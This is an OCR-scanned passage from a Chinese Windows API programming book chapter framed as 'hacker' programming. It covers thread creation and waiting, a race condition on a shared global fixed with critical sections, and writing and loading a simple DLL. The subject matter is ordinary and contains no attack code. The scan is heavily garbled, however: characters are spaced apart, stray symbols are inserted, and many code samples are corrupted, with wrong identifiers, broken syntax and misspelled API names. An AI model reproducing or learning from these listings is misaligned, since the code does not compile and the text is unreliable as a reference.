拥有 系统 资源 ， 线 程 所 使 用 的 资源 全 部 由 进程 向 系统 申请 ， 线 程 拥有 的 是 CPU 的 时 间 片 。 

在 单 处 理 器 上 或 单 核 处 理 器 上 )， 同 一 个 进程 中 的 不 同 线程 交 蔡 得 到 CPU 的 时 间 片 。 
在 多 处 理 器 上 《或 多 核 处 理 器 上 )， 不 同 的 线程 可 以 同时 运行 在 不 同 的 CPU 上 ， 这 样 可 以 提 
高 程序 运行 的 效率 。 除 此 之 外 ， 在 有 些 方面 必须 使 用 多 线程 。 比 如 ， 如 果 在 扫描 磁盘 并 同时 
在 程序 界面 上 同步 显示 当前 扫描 的 位 置 时 ， 必 须 使 用 多 线程 。 因 为 在 程序 界面 上 显示 和 磁盘 
的 扫描 工作 在 同一 个 线程 中 ， 而 且 界 面 也 在 不 停 进行 重新 显示 ， 这 样 就 会 导致 软件 看 起 来 像 
是 卡 死 一 样 。 在 这 种 情况 下 ， 分 为 两 个 线程 就 可 以 解决 该 问题 ， 界 面 的 显示 由 主线 程 完成 ， 
而 扫描 磁盘 的 工作 由 另外 一 个 线程 完成 ， 两 个 线程 协同 工作 ， 这 样 就 可 以 达到 实时 显示 当前 
扫描 状态 的 效果 了 。 

首先 了 解 一 下 线程 的 创建 。 线 程 的 创建 使 用 CreateThread() 函 数 ， 该 函数 的 原型 如 下 : 


HANDLE CreateThread'( 
LPSECURITY ATTRIBUTES lpThreadAttributes, // SD 


DWORD dwStacksize， // initial stack size 
LPTHREAD_START ROUTINE lpstartAddress, //, thread function 
LPVOID lpParameter, // thread argument 
DWORD dwCreationFlags, // creation option 
LPDWORD lpThreadIid // thread identifier 
); 
参数 说 明 如 下 。 


lpThreadAttributes: 指明 创建 线程 的 安全 属性 , 为 指向 SECURITY_ATTRIBUTES 结构 的 
指针 ， 该 参数 一 般 设 置 为 NULL。 

dwStackSize: 指定 线程 使 用 缺 省 的 堆栈 大 小 ， 如 果 为 NULL， 则 与 进程 主线 程 栈 相同 。 

lpStartAddress: 指定 线程 函数 ， 线 程 即 从 该 函数 的 入 口 处 开始 运行 ， 函 数 返 回 时 就 意味 
着 线程 终止 运行 ， 该 函数 属于 一 个 回调 函数 。 线 程 函 数 的 定义 形式 如 下 : 

DWORD WINAPI ThreadProct 4 


LPVOID 1PParameter  // thread data 
) 


线程 函数 的 返回 值 为 DWORD 类 型 ， 线 程 函数 只 有 一 个 参数 ， 该 参数 在 CreateThread() 
函数 中 给 出 。 该 函数 的 函数 名 称 可 以 任意 给 定 。 很 多 时 候 并 不 能 保证 执行 了 CreateThread() 
函数 后 线程 就 会 立即 启动 ， 线 程 的 启动 需要 等 待 CPU 的 调度 ，CPU 将 时 间 片 给 该 线程 时 ， 
该 线程 才 会 执行 ， 当 然 这 个 时 间 短 到 可 以 忽略 它 。 

lpParameter: 该 参数 表示 传递 给 线程 函数 的 一 个 参数 ， 可 以 是 指向 任意 数据 类 型 的 指针 。 
这 里 是 一 个 指针 ， 可 以 方便 的 将 多 个 参数 通过 结构 体 等 一 次 性 传 到 线程 函数 中 。 

dwCreationFlags: 该 参数 指明 创建 线程 后 的 线程 状态 ， 在 创建 线程 后 可 以 让 线程 立刻 执 
行 (这 里 的 立即 执行 的 意思 是 不 会 受 人 为 的 去 让 它 处 于 等 待 状态 ), 也 可 以 让 线程 处 于 暂停 状 
态 。 如 果 需 要 立刻 执行 ， 该 参数 设置 为 0， 如 果 要 让 线程 处 于 暂停 状态 ， 那 么 该 参数 设置 为 
CREATE_SUSPENDED， 待 需要 线程 执行 时 调用 前 面 介绍 过 的 ResumeThread0) 函 数 让 线程 的 
状态 调整 为 等 待 运行 的 状态 ， 然 后 由 CPU 分 配 时 间 片 后 去 执行 。 

lpThreadId: 该 参数 用 于 返回 新 创建 线程 的 线程 D。 

如 果 线 程 创建 成 功 ， 该 函数 返回 线程 的 句柄 ， 和 否则 返回 NULL。 创 建新 线程 后 ， 该 线程 
就 开始 启动 执行 了 。 但 如 果 在 dwCreationFlags 中 使 用 了 CREATE SUSPENDED 参数 ， 那 么 
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线程 并 不 马上 执行 ， 而 是 先 挂 起 ， 等 到 调用 ResumeThread 后 才 开始 启动 线程 。 线 程 的 句柄 


第 需要 通过 CloseHandle() 进 行 关 闭 ， 以 便 释 放 资 源 。 
章 写 一 个 简单 的 多 线程 的 例子 ， 代 码 如 下 : 
#include <windows.h> 

黑 #include <stdio.h> 

: DWORD WINAPI ThreadProc(LPVOID lpParam) 

三 { 

printf( "mireadPros Nr 

© 

3 return, 0% 

I +: 

二 int in() 

int main 

纺 { 

程 HANDLE hThread = CreateThread (NULL, 
07 
ThreadProc, 
NULL,, 

re 0 
NULL) 
printf ("main \r\n"); 





CloseHandle (hThread); 


return ‘07 


} 

代码 在 主线 程 中 打印 一 行 “main”， 在 创建 的 新 线程 中 
会 打印 一 行 “ThreadProc”。 编 译 运 行 ， 查 看 其 运行 结果 ， 
如 图 3-20 所 示 。 

从 图 3-20 中 看 出 ， 程 序 的 输出 跟 预 期 的 结果 并 不 相 
同 。 程序 的 问题 出 在 了 哪里 呢 ? 每 个 线程 都 有 属于 自己 的 
CPU 时 间 片 ， 当 主线 程 创 建新 线程 后 ， 主 线程 的 CPU 时 间 片 并 未 结束 ， 它 会 向 下 继续 执行 。 
由 于 主线 程 的 代码 非常 少 , 因此 主线 程 在 CPU 分 配 的 时 间 片 中 就 执行 完成 并 退出 了 。 由 于 主 
线程 的 结束 ， 意 味 着 进程 也 就 结束 并 退出 了 。 因 此 ， 在 代码 中 创建 的 线程 虽然 被 创建 了 ， 但 
是 根本 就 没有 执行 的 机 会 。 那 么 在 这 么 短 的 代码 中 ， 如 何 保证 新 创建 的 线程 在 主线 程 结束 前 
就 能 得 到 执行 呢 ? 或 者 说 ， 主 线程 的 运行 需要 等 待 新 线程 的 完成 才 得 以 执行 。 这 里 需要 使 用 
WaitForSingleObject() 函 数 ， 该 函数 的 原型 如 下 : 

DWORD WaitForSingleQbject!( 


HANDLE hHandle, // handle to object 
DWORD dwMilliseconds // time-out interval 





图 3-20 多 线程 程序 输出 结果 





)2 

参数 说 明 如 下 。 

hHandle: 该 参数 为 要 等 待 的 对 象 句 柄 。 

dwMilliseconds: 该 参数 指定 等 待 超时 的 毫秒 数 ， 如 果 设 为 0， 则 立即 返回 ， 如 果 设 为 


INFINITE， 则 表示 一 直 等 待 线程 函数 的 返回 。INEINITE 是 系统 定义 的 一 个 宏 ， 其 定义 如 下 。 
#define INFINITE OxFFFFFFFF 


如 果 该 函数 失败 ， 则 返回 WAIT_FAILED; 如 果 等 待 的 对 象 编程 激发 状态 ， 则 返回 WAIT_ 
OBJECT_0; 如 果 等 待 对 象 变 成 激发 状态 之 前 ， 等 待 时 间 结 束 了 ， 将 返回 WAIT_TIMEOUT。 
修改 上 面 的 代码 ， 在 CreateThread() 函 数 后 面 加 入 如 下 代码 : 


秆 盖 = = = 
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WaitForsingleobject (hThread, INFINITE); 
添加 WaitForSingleObject() 函 数 以 后 ， 主 线程 会 等 竺 新 创建 的 线程 结束 再 继续 向 下 执行 主线 
程 后 续 的 代码 。 这 样 在 控制 台 上 的 输出 如 图 3-21 所 示 。 
WaitForSingleObject() 只 能 等 待 一 个 线程 ， 可 是 在 程 
序 中 往往 要 创建 多 个 线程 来 执行 ,那么 如 果 需 要 等 待 若 
干 个 线程 的 完成 状态 的 话 ，WaitForSingleObject() 函 数 就 





一 i s E 3 主线 程 等 待 子 线程 共 全 
无 能 为 力 了 。 不 过 ， 系 统 除 了 提供 WaitForSingleObject() 人 
函数 外 ， 还 提供 了 另外 一 个 可 以 等 待 多 个 线程 的 完成 状态 的 函数 WaitForMultipleObjects()， 
该 函数 的 定义 如 下 : 
DWORD WaitPForMultipleobjects( 

DWORD nCount, // number of handles in array 

CONST HANDLE *lpHandles, // object-handle array 

BOOEL fWaitaAll, // wait option 


DWORD dwMilliseconds // time-out interval 
) - 


该 函数 的 参数 比 WaitForSingleObject0 函 数 多 2 个 参数 ， 下 面 介绍 这 些 参 数 。 
nCount: 该 参数 用 于 指明 想 要 让 函数 等 待 的 线程 的 数量 。 该 参数 的 取 值 范围 在 1 到 
MAXIMUM WAIT OBJECTS 之 间 。 
lpHandles: 该 参数 是 指 癌 等 待 线程 句柄 的 数组 指针 。 
fWaitAll: 该 参数 表示 是 否 等 待 全 部 线程 的 状态 完成 ， 如 果 设 置 为 TRUE， 则 等 待 全 部 。 
dwMilliseconds: 该 参数 与 WaitForSingleObject() 函 数 中 的 dwMilliseconds 用 法 相同 。 


py 注 : WaitForsingleObject() 和 WaitForMultipleObjects() 两 个 函数 除了 可 以 等 待 线 程 外 ， 还 可 以 等 待 用 于 多 
线程 同步 和 互 斥 的 内 核对 象 。 


在 使 用 多 线程 的 时 候 常 常 需 要 考虑 和 注意 的 问题 很 多 。 比 如 多 线程 同时 对 一 个 共享 资源 
进行 操作 ， 通 过 线程 需要 按照 一 定 的 顺序 执行 等 。 看 一 个 简单 的 多 线程 例子 : 


int g_Num One = 0; 


DWORD WINAPI ThreadProc(LPVOID lpParam) 
{ 
int nTmp = 0; 


:TEL 


{ 
nTmp = g_ Num One; 
nTmp 十 二 7 
// Sleep (1) 的 作用 是 让 出 CPU 
7/ 使 其 他 线程 被 调度 运行 
Sleep (1) 7 
g_Num One = nTmp; 

} 

return 0; 


} 

每 个 线程 都 有 一 个 CPU 时 间 片 ， 当 自己 的 时 间 片 运行 完成 后 ，CPU 会 停止 该 线程 的 运 
行 ， 并 切换 到 其 他 线程 去 运行 。 当 多 线程 同时 操作 一 个 共享 资源 时 ， 这 样 的 切换 会 带 来 隐形 
的 问题 。 这 里 的 代码 比较 短 , 在 一 个 CPU 时 间 片 内 肯定 会 完成 , 无 法 体现 出 因 线 程 切换 而 产 
生 的 错误 。 为 了 达到 能 够 因 线程 切换 导致 的 错误 ， 在 代码 中 加 入 了 Sleep(1)， 使 得 线程 主动 
让 出 CPU， 让 CPU 进行 线程 切换 。 在 代码 中 ， 线 程 处 理 的 共享 资源 是 全 局 变量 g_ Num_One 
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变量 。 主 函数 创建 线程 的 代码 如 下 : 
int main() 
HANDLE hrThread[d0l = {0 }» 
de 
or (d= Or a 10 + ) 
{ 


hThread[i] = CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL); 
} 


WaitForMultipleOQbjects (10, hiThread, 'TRUE, TNELINITE); 
EB (Cel em 0 hb 
NR 


CloseHandle (hThread[1]); 
} 


printf("g Num One = %d \r\n", g_Num One); 


return 07 


} 

在 主 函数 中 ， 通 过 CreateThread() 创 建 了 10 个 线程 ， 每 个 线程 都 让 g Num _One 自 增 10 
次 ， 每 次 的 增 量 为 1。 那 么 10 个 线程 会 使 得 g_ Num_One 的 结果 变 成 100。 编 译 运 行 上 面 的 
代码 ， 查 看 输出 结果 ， 如 图 3-22 所 示 。 

这 个 结果 和 预测 的 结果 并 不 相同 。 为 什么 会 产生 这 
种 不 同 呢 ? 这 里 进行 一 次 模拟 分 析 。 为 了 方便 分 析 ， 把 
线程 的 数量 缩小 为 两 个 线程 ， 分 别 是 4 线程 和 B 线程 。 

@ g Num_ One 的 初始 值 为 0。 图 3-22 多 线程 操作 共享 资源 的 错误 结果 

@@ 当 4 线程 中 执行 ITmp = g_Num_One 和 nTmp++ 后 (此 时 nTmp 的 值 为 1)， 因 为 
Sleep(1) 的 原因 发 生 了 线程 切换 ， 此 时 g_ Num_One 的 初始 值 仍然 为 0。 

@ 当中 线程 中 执行 nTmp = g Num One 和 nTmp++ 后 (此 时 nTmp 的 值 也 为 1 )， 因 为 
Sleep(1) 的 原因 又 发 生 了 线程 切换 。 

由 4 线程 执行 & Num _One =nTmp， 此 时 g Num One 的 值 为 1， 接 着 执行 下 一 次 循环 中 
的 nTmp =g Num One 和 nTmp++ 的 操作 ， 又 进行 切换 。 

@ 中 线程 执行 g Num One=nTmp， 此 时 g Num One 的 值 为 1。 

到 第 @ 步 时 ， 不 继续 往 下 分 析 了 ， 已 经 可 以 看 出 原因 。g Num One 的 值 是 最 后 一 次 nTmp 
进行 赋值 后 的 值 (线程 中 的 局 部 变量 属于 线程 内 私有 的 , 虽然 是 同一 个 线程 函数 , 但 是 nTmp 
在 每 个 线程 中 是 私有 的 )。 

解决 该 问题 ， 这 里 使 用 的 是 临界 区 。 临 界 区 对 象 是 一 个 CRITICAL SECTION 的 数据 结 
构 ，Windows 操作 系统 使 用 该 数据 结构 对 关键 代码 进行 保护 ， 以 确保 多 线程 下 的 共享 资源 。 
在 同一 时 间 内 ，Windows 只 允许 一 个 线程 进入 临界 区 。 

临界 区 的 函数 有 4 个, 分别 是 初始 化 临界 区 对 象 (InitializeCriticalSection())、 进 入 临 
界 区 (EnterCriticalSection())、 离 开 临 界 区 (LeaveCriticalSection()〉 和 删除 临界 区 对 象 
(DeleteCriticalSection())。 临 界 区 很 好 的 保护 了 共享 资源 ,临界 区 在 现实 生活 中 有 很 多 类 似 的 
例子 。 比 如 ， 在 进行 体检 的 时 候 ， 一 个 体检 室内 只 有 一 个 体检 医生 ， 体 检 上 医生 会 叫 一 个 患者 
进去 体检 ， 这 时 其 他 人 是 不 能 进入 的 ， 当 这 个 患者 离开 后 ， 下 一 个 患者 才 可 以 进入 。 这 里 体 
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检 医 生 就 是 一 个 共享 的 资源 ， 而 每 个 体检 的 患者 是 多 个 不 同 的 线程 。 临 界 区 就 是 以 类 似 的 方 
式 保护 了 共享 资源 不 被 破坏 的 。 下 面 依次 来 看 一 下 这 四 个 函数 关于 临界 区 的 函数 的 定义 ， 分 
别 如 下 : 
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这 4 个 API 函数 的 参数 都 是 指向 CRITICAL SECTION 结构 体 的 指针 。 修 改 上 面 有 问题 
的 代码 ， 修 改 后 的 代码 如 下 
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上 
CloseHandle (hThread{[i]); 


DeleteCriticalSection(&g_cs); 
vetuirn Or 


} 

编译 以 上 代码 并 运行 , 输出 结果 为 想 要 的 正确 结果 ， 即 g_ Num_One 的 值 为 100。 除 了 使 
用 临界 区 以 外 ， 对 于 线程 的 同步 与 互 斥 还 有 其 他 方法 ， 这 里 就 不 一 一 进行 介绍 了 。 和 希望 读者 
在 今后 开发 多 线程 程序 时 ， 要 注意 多 线程 的 同步 与 互 斥 问题 。 


/py 注 : 临界 区 对 象 只 能 用 于 多 线程 的 互 斥 。 


3.5 DLL 编程 


DLL (Dynamic Link Library， 动 态 连 接 库 ) 是 一 个 可 以 被 其 他 应 用 程序 调用 的 程序 模块 ， 
其 中 封装 了 可 以 被 调用 的 资源 或 函数 。 动 态 连接 库 的 扩展 名 一 般 是 DLL, 不 过 有 时 也 可 能 是 
其 他 的 扩展 名 。DLL 文件 属于 可 执行 文件 ， 它 符合 Windows 系统 的 PE 文件 格式 ， 不 过 它 是 
依附 于 EXE 文件 创建 的 进程 来 执行 的 ， 不 能 单独 运行 。 一 个 DLL 文件 可 以 被 多 个 进程 所 装 
载 调用 。 

Windows 操作 系统 下 有 非常 多 的 DLL 文件 ， 有 的 是 操作 系统 的 DLL 文件 ， 有 的 是 应 用 
程序 的 DLL 文件 。 使 用 DLL 文件 有 什么 好 处 呢 ? DLL 是 动态 连接 库 ， 相 对 应 地 ， 有 静态 连 
接 库 。 动 态 连接 库 是 在 EXE 文件 运行 时 被 加 载 执行 的 ， 而 静态 连接 库 是 OBJ 文件 进行 连接 
时 同时 被 保存 到 程序 中 的 。 动 态 连接 库 可 以 减少 可 执行 文件 的 体积 , 在 需要 的 时 候 进入 内 存 ; 
将 软件 划分 为 多 个 模块 ， 可 以 按照 模块 进行 开发 ， 对 于 发 布 与 升级 也 非常 方便 。 在 某 些 情 况 
下 ， 必 须 使 用 DLL 才能 完成 一 些 工作 内 容 。 


3.5.1 编写 一 个 简单 的 DLL 程序 


DLL 程序 的 编写 与 运行 都 有 别 于 前 面 编写 的 程序 ， 无 论 是 函数 的 入 口 还 是 其 执行 的 方 
式 ， 都 有 所 不 同 。 下 面 通过 一 个 简单 的 DLL 程序 来 初步 了 解 DLL 程序 的 编写 。 

1. 编写 简单 的 DLL 程序 

首先 从 一 个 简单 的 DLL 程序 开始 ,并 在 DLL 程序 中 添加 一 个 导出 函数 。 所 谓 导 出 函数 ， 
就 是 DLL 提供 给 外 部 EXE 或 其 他 类 型 的 可 执行 文件 调用 的 函数 。 当 然 ，DLL 本 身 也 可 以 自 
身 进 行 调用 。 

DLL 程序 的 入 口 函数 不 是 main(0) 函 数 ， 也 不 是 WinMain() 函 数 ， 而 是 DlIMain() 函 数 ， 该 
函数 的 定义 如 下 : 


BOOL WINAPI DllMain( 

HINSTANCE hinstDLL, // handle to the DLL module 
DWORD fdwReason, // reason for calling function 
LPVOID lpvReserved // reserved 

); 





中 
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117 
参数 说 明 如 下 。 
hinstDLL: 该 参数 是 当前 DLL 模块 的 句柄 ， 即 本 动态 连接 库 模 块 的 实例 句柄 。 第 
fdwReason: 该 参数 表示 DlIMain() 函 数 被 调用 的 原因 。 过 
该 参数 的 取 值 有 4 种 ， 也 就 是 说 存在 4 种 调用 DllMain0) 函 数 的 情况 ， 这 4 个 值 分 别 是 时 
DLL PROCESS_ATTACH ( 当 DLL 被 某 进 程 加 载 时 ，DlIMain(0) 函 数 被 调用 )、DLL PRO | 客 
CESS_DETACH ( 当 DLL 被 某 进 程 卸 载 时 ，DIIMain() 函 数 被 调用 )、DLL THREAD_ATTACH 
〈 当 进程 中 有 线程 被 创建 时 ，DllMain0O) 函 数 被 调用 )》 和 DLL_THREAD_DETACH 〈( 当 进程 中 8 
有 线程 结束 时 ，DIlIMain() 函 数 被 调用 )。 3 
lpvReserved: 保留 参数 ， 即 不 被 程序 员 使 用 的 参数 。 到 
启动 VC6 集成 开发 环境 ， 创 建 一 个 DLL 工程 。 创 建 一 个 “A simple DLL Project” 类 型 - 
的 工程 ，VC 生成 代码 如 下 : 
BOOL APIENTRY D11Maimn( HANDLE hModule, 
DWORD ul] reason for call, 
LPVOID lpReserved Cr 


) 
{ 
return TRUE; 
} 
在 生成 的 代码 中 ， 函 数 定义 处 有 一 个 APIENTRY 的 函数 修饰 符 。 该 修饰 符 为 一 个 宏 ， 其 
定义 如 下 : 
#define APIENTRY WINAPI 
由 于 DIIMain() 函 数 不 止 一 次 地 被 调用 ， 根 据 调 用 的 情况 不 同 ， 需 要 执行 不 同 的 代码 ， 比 
如 当 进 程 加 载 该 DLL 文件 时 ， 可 能 在 DLL 中 要 申请 一 些 资 源 ; 而 在 卸载 该 DLL 时 ， 则 需要 
将 先前 自身 所 申请 的 资源 进行 释放 。 出 于 种 种 原因 ， 在 编写 DLL 程序 时 ， 需 要 把 DlIMain() 
函数 的 结构 写成 如 下 形式 : 
BOOL APIENTRY DilMain( HANDLE hModule, 
DWORD ul reason for call, 
LPVOID lpReserved 
) 
Switch ( tl reason for call ) 
Case DLL PROCESS ATTACH: 
break; 
} 
case DLL PROCESS DETACH: 
break; 
} 
case DLL THREAD ATTACH: 
break; 
} 
Case DLL THREAD DETACH: 
break; 
} 
} 


return ‘TRUE; 
} 


这 是 一 个 switch/case 结构 ， 这 样 写 可 以 达到 根据 不 同 的 调用 原因 执行 不 同 的 代码 。 





© 
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: 


> 注 : DLL 文件 的 入 口 函数 是 本 书 介 绍 的 另外 一 种 入 口 函 数 了 ， 前 面 介绍 的 有 main() 和 WinMain() 两 种 ， 但 

是 通过 前 面 的 介绍 读者 可 以 知道 ， 这 两 个 入 口 函 数 都 并 非 是 真正 的 程序 的 入 口 函数 ， 而 是 程序 员 编 程 时 的 
入 口 函 数 。 那 么 对 于 DLL 文件 的 入 口 函 数 DllMain() 函 数 而 言 ， 它 就 更 不 一 般 了 。 如 果 在 DLL 的 具体 使 用 
中 根本 不 考虑 DLL 文件 加 载 的 时 机 的 话 ， 那 么 DllMain() 函 数 是 可 以 不 存在 的 。 也 就 是 说 DLL 文件 可 以 不 
需要 入 口 函 数 。 


2. 给 DLL 添加 一 个 简单 的 导出 函数 

上 面 的 代码 只 是 一 个 简单 的 DLL 程序 的 开始 ， 并 没有 实际 的 意义 。 对 于 DLL 文件 来 说 ， 
DIIMain() 并 不 是 必需 的 , 这 一 点 读者 已 经 有 所 了 解 。 按 照 DLL 文件 的 本 质 作 用 是 为 其 他 的 可 
执行 文件 提供 使 用 , 那么 DLL 程序 中 需要 编写 能 够 提供 其 他 程序 使 用 的 函数 , 这 些 公开 提供 
给 其 他 程序 使 用 的 函数 被 称 为 导出 函数 。 在 上 面 代码 的 基础 上 添加 一 个 导出 函数 ， 定 义 如 下 : 


extern nc declspec(dllexport) VOID MsgBox (char *szMsg):; 

exterm "C" 表 示 该 函数 以 C 方式 导出 。 由 于 源 代码 是 .CPP 文件 ， 因 此 ， 如 果 按 照 C++ 的 
方式 导出 的 话 ， 那 么 在 编译 后 函数 名 会 被 名 字 粉 碎 ， 导 致 在 动态 调用 该 函数 时 就 会 极为 不 方 
便 。_declspec(dllexporb 的 作用 是 声明 一 个 导出 函数 ， 将 该 函数 从 本 DLL 中 开放 提供 给 其 他 
模块 使 用 。 

MsgBox0 函 数 的 实现 如 下 : 

VOID MsgBox (char *szMsg) 


{ 
char szModuleName [MAX PATH] = { 0 j}7 


GetModuleFileName (NULL, szModuleName, MAX PATH); 


MessageBox (NULL, szMsg, szModuleName, MB OK)'; 


} 

该 函数 在 被 调用 时 会 在 MessageBox 窗口 的 标题 栏 处 显示 其 所 在 进程 的 进程 名 。 

这 样 ， 第 一 个 DLL 文件 的 编写 就 完成 了 。 编译 连接 该 代码 ， 查 看 编译 和 连接 的 输出 情况 
会 发 现 VC 共生 成 了 2 个 文件 ， 分 别 是 “FirstDll.dll” 和 “FirstDllLlib”， 前 者 是 供 其 他 可 执行 
程序 使 用 的 DLL 文件 ， 其 中 包含 了 程序 员 编 写 的 代码 、 导 出 函数 ， 而 后 者 是 一 个 库 文件 ,其 
中 包含 一 些 导出 函数 的 相关 信息 ， 供 调用 DLL 文件 中 导出 函数 函数 的 程序 员 编 译 时 使 用 。 


py 注 : 导出 DLL 中 的 函数 有 两 种 方法 ， 这 是 其 中 的 一 种 。 另 外 一 种 方式 是 建立 一 个 .DEF 的 文件 来 定义 导出 

哪些 函数 。 函 数 除了 可 以 通过 函数 名 导出 外 ， 还 可 以 通过 序号 进行 导出 。 建 立 .DEF 文件 可 以 较为 方便 地 管 
理 DLL 项目 中 的 导出 函数 ( 总 比 在 代码 中 逐个 找 _declspec(dllexport) 要 方便 很 多 )。 由 于 这 里 的 代码 比较 
短小 ， 因 此 使 用 了 __declspec(dllexport) 这 种 定义 方法 。 


3. 对 DLL 程序 的 调用 方法 一 

DLL 程序 是 无 法 单独 运行 的 , 它 需 要 通过 编写 一 个 EXE 程序 (当然 也 可 以 在 男 外 的 DLL 
程序 中 调用 ) 来 调用 这 个 DLL 文件 中 的 导出 函数 ,在 VC 集 ss 六 
成 开发 环境 中 添加 一 个 测试 项 目 ， 在 工作 区 的 “Workspace | 包 下 
FirstD1P:1 project(s)” 上 单 击 右键 ， 在 弹出 的 菜单 中 选择 
“Add New Project to Workspace”， 如 图 3-23 所 示 。 

添加 一 个 控制 台 的 项 目 ， 然 后 编写 对 DLL 进行 调用 的 
测试 代码 ， 有 具体 如 下 : 图 3-23 ”添加 对 DLL 进行 测试 的 项 目 
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#include <windows.h> 

#pragma comment (lib, "FirstDl1") 
extern "C" VOID MsgBox (char *szMsg); 
int main(int argc, char* argv[]) 
MsgBox ("Hello First DII !1"); 


return 0 


#pragma comment (lib, "FirstD11") 告 诉 连接 器 需要 在 FirstDll.lib 文件 中 找到 DLL 中 导出 函 
数 的 信息 。 
对 以 上 代码 进行 编译 连接 ，VC 会 产生 一 个 连接 错误 ， 如 图 3-24 所 示 。 


: fatal error LNK1164: cannot open file “FirstD11.1ib" 
Error executing link.exe. 





DllTesti.exe - 1 error{(s), § warning(s) 


图 3-24 连接 出 错 信息 


这 个 错误 是 因为 连接 器 找 不 到 “FirstDlllib” 文 件 。 将 “FirstDll.lib” 复 制 到 测试 项 目的 
目录 下 ， 然 后 添加 到 测试 工程 中 ， 再 次 进行 编译 连接 就 成 功 了 。 运 行 编写 好 的 测试 程序 ， 会 
弹出 一 个 错误 对 话 框 ， 如 图 3-25 所 示 。 








图 3-25 运行 测试 程序 时 的 错误 信息 


根据 错误 提示 可 以 看 出 是 缺少 要 测试 的 DLL 文件 ， 也 就 是 “FirstDll.dll” 文 件 。 将 其 复 
制 到 与 可 执行 文件 相同 的 目录 下 ， 然 后 再 次 运行 ， 程 序 可 以 顺利 地 被 执行 。 


EDy 注 : 一 般 在 发 布 DLL 文件 时 , 需要 将 DLL 文件 、Lib 文件 和 .h 文件 同时 发 布 ， 当 然 有 一 个 说 明文 档 或 手册 
会 显得 更 加 专业 。 


4. 对 DLL 程序 的 调用 方法 二 

前 一 种 方法 属于 静态 调用 ， 其 方式 是 通过 连接 器 将 DLL 函数 的 导出 函数 写 进 可 执行 文件 。 现 
在 使 用 第 二 种 方法 来 调用 DLL 中 的 函数 ， 这 种 方法 相对 于 前 一 种 方法 是 动态 调用 。 动 态 调 用 不 是 
在 连接 时 完成 的 ， 而 是 在 运行 时 完成 的 。 动 态 调用 不 会 在 可 执行 文件 中 写 入 DLL 的 相关 信息 。 现 
在 来 写 一 个 关于 动态 调用 的 测试 程序 ， 该 程序 的 创建 方法 与 静态 调用 的 方法 相同 ， 这 里 不 再 复述 。 

动态 调用 DLL 函数 的 代码 如 下 : 


#inciude <windows.h> 





typedef VOID (*PFUNMSG) (char 二 ) 天 





高 台 ldv SMOpuIM 呈 狂 “山中 没 











前 鞭 ldv swopuI 从 旦 钼 ” 山 吕 商 


第 3 章 黑客 Windows API 编程 





int main(int argc char* argv[]) 

{ 
HMODULE hModule = LoadLibrary ("FirstDll.di1"); 
it ( hModule == NULL ) 
1 


MessageBox (NULL，"FirstDll.d11 文件 不 存在 "， 
”DID 文件 加 载 失败 "，MB_OK) ; 


return_ -17 


} 


PFUNMSG pFunMsg = (PEUNMSG)GetProcAddress (hModule, "MsgBox"); 
pFEunMsg("Hello First D1 1!")y 


return 0; 


} 

对 代码 进行 编译 连接 都 正常 通过 。 但 是 请 注意 ,这 个 程序 中 并 没有 用 到 #pragma comment() 
指令 ， 也 没有 通过 lib 在 程序 中 留 下 相关 的 导入 信息 (导入 和 导出 是 相对 的 概念 ， 这 个 概念 
在 后 面 的 章节 会 具体 谈 到 )。 运 行 编译 连接 好 的 程序 ， 程 序 会 给 出 提示 “FirstDll.dll 文件 不 存 
在 ” 按照 前 面 的 方法 ， 将 FirstDll.dll 文件 复制 到 与 测试 程序 相同 的 目录 下 ， 运 行 测试 程序 
程序 执行 成 功 。 

DLL 的 动态 加 载 调 用 是 非常 有 用 的 。 在 第 一 个 测试 程序 中 ， 如 果 测 试 系统 的 装载 器 无 法 找 
到 DLL 文件 , 那么 系统 会 直接 报错 而 退出 。 而 在 第 二 个 测试 程序 中 , 如 果 测 试 程序 无 法 找到 DLL 
文件 ， 则 由 程序 给 出 一 个 错误 的 提示 ， 同 时 程序 其 实 可 以 继续 往 下 执行 ， 而 不 会 影响 其 他 代码 的 
运行 (当然 ,由 于 DLL 无 法 加 载 可 能 会 损失 部 分 的 功能 )。 明 白 了 动态 加 载 调用 和 静态 加 载 调用 
的 区 别 ， 那 么 它们 的 优 缺 点 就 很 清楚 了 。 静 态 加 载 调用 使 用 方便 ， 而 动态 加 载 调用 灵活 性 较 好 。 

在 有 些 情况 下 ; 必须 使 用 动态 加 载 调用 的 方法 来 使 用 DLL 中 的 导出 函数 。 比 如 在 前 面 介 
绍 过 的 一 个 函数 OpenThread(), 该 函数 在 VC6 自 带 的 PSDK 中 没有 提供 LIB 文件 和 函数 原型 
定义 ， 没 有 LIB 文件 就 无 法 连接 成 功 ( 在 新 版 的 PSDK 中 有 该 函数 对 应 的 LIB 文件 )。 在 这 
种 情况 下 ， 只 能 使 用 LoadLibrary() 和 GetProcAddress() 这 两 个 函数 来 动态 加 载 调用 
OpenThread() 函 数 (其 实 有 很 多 情况 下 , 在 使 用 DLL 文件 中 的 导出 函数 时 是 找 不 到 对 应 的 LIB 
文件 的 ， 比 如 ntdll.dll 中 的 很 多 函数 虽然 有 导出 ， 但 是 系统 没有 提供 与 其 对 应 的 LIB 文件 )。 

现在 了 解 一 下 LoadLibrary() 函 数 和 GetProcAddress() 函 数 的 定义 。LoadLibrary() 函 数 的 定 
义 如 下 : 


HMODULE LoadLibrary( 
LPCTSTR lpFileName 
); 


该 函数 只 有 一 个 参数 ， 即 要 加 载 的 DLL 文件 的 文件 名 。 该 函数 调用 成 功 ， 则 返回 一 个 模 
块 句柄 。 
GetProcAddress() 函 数 的 定义 如 下 : 


FARPROC GetProcAddress!( 
HMODULE hModule, 
TR lpProcName 


该 函数 有 两 个 参数 ， 分 别 如 下 。 
hModule: 该 参数 是 模块 句柄 ， 通 常 通过 LoadLibrary() 函 数 或 GetModuleHandle() 函 数 获得 ; 
lpProcName: 该 参数 指定 要 获得 函数 地 址 的 函数 名 称 。 
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该 函数 调用 成 功 ， 则 返回 lpProcName 指向 的 函数 名 的 函数 地 址 。 

5. 查看 DLL 程序 导出 函数 的 工具 介绍 

前 面 介 绍 DLL 编程 时 提 到 了 导出 函数 , 这 里 介绍 两 款 查看 DLL 程序 的 导出 函数 的 工具 。 
其 中 一 款 是 VC 自 带 的 工具 “Depends”， 另 一 款 工具 是 一 个 功能 更 加 强大 的 可 以 用 来 查看 PE 
结构 (关于 PE 结构 的 内 容 ， 在 后 面 章节 会 专门 进行 介绍 ) 和 识别 加 壳 信 息 的 工具 “PEID ”。 

首先 用 “Depends” 来 查看 DLL 的 导出 函数 ， 该 工具 可 以 在 VC6 的 安装 菜单 下 找到 ， 具 
